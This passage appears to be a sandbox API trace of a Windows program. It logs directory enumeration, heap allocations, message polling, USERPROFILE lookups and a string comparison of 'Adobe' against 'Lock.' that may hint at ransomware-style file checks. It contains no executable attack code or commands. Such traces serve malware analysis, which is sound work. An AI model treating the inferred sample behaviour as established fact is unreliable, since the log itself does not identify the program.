hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2ab32d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2ab32d60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x24aa020, dwReserved1=0x25c6e50, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0207.664] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.664] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.664] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.664] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.664] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.664] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x25c6d68, ftCreationTime.dwHighDateTime=0x25c6a58, ftLastAccessTime.dwLowDateTime=0x10, ftLastAccessTime.dwHighDateTime=0x24b1938, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x240d650, nFileSizeHigh=0x25c6a58, nFileSizeLow=0x25c6b70, dwReserved0=0x24a9420, dwReserved1=0x25c6e50, cFileName="\x25b9\x34\xf1dc\x8b\x205\x01\xff78\x8b\x1ecd\x771a\x25b9\x34\xfffe\xffff\xe36c\x7715\xe0d2\x7715\x9870\x24a\x9de0\x24a\x10", cAlternateFileName="\x8e1a\x40\x8154\x241\xf47c\x8b\x8614\x4a\x3cfb\x40\x8178\x4a\xf580\x8b\xf484\x8b\x3d76\x40\xf4a0\x8b\xf580\x8b\x85f4\x4a\x61")) returned 0 [0207.664] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.664] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.664] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0207.665] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.665] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.665] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.665] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.665] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.665] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Adobe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0207.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0207.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0207.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0207.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0207.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0207.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0207.665] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0207.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0207.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0207.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0207.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0207.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0207.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0207.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0207.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0207.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0207.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0207.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0207.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0207.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0207.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0207.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0207.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0207.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0207.667] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.667] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0207.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0207.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0207.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0207.667] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0207.667] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0207.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0207.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0207.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0207.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0207.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0207.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0207.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0207.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0207.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0207.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0207.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0207.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0207.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0207.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0207.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0207.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0207.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0207.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0207.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0207.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0207.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0207.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0207.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0207.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0207.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0207.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0207.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1438 [0207.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0207.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0207.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0207.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0207.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0207.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0207.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0207.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0207.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0207.669] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0207.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0207.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa550 [0207.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0207.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0207.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa808 [0207.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0207.669] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0207.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0207.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0207.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0207.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0207.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0207.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0207.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0207.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0207.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0207.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0207.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0207.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0207.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0207.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0207.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0207.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0207.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x249c7b0 [0207.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0207.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0207.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0207.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0207.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0207.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0207.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0207.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0207.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0207.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0207.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0207.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0207.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2088 [0207.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0207.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0207.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0207.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa448 [0207.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0207.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0207.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0207.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0207.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0207.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0207.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0207.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0207.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0207.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0207.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0207.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0207.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0207.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0207.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0207.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0207.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0207.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0207.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0207.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0207.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0207.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0207.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0207.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0207.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0207.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0207.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0207.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0207.672] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0207.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0207.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0207.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0207.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0207.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0207.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0207.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0207.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0207.672] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0207.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0207.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0207.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0207.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0207.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0207.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0207.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0207.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0207.673] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0207.673] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0207.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0207.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0207.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0207.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0207.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0207.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0207.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0207.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0207.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0207.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0207.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0207.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0207.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0207.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0207.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0207.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0207.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0207.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0207.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0207.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0207.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0207.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0207.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0207.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0207.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0207.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0207.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0207.674] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0207.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0207.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0207.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0207.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0207.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0207.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0207.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0207.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0207.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 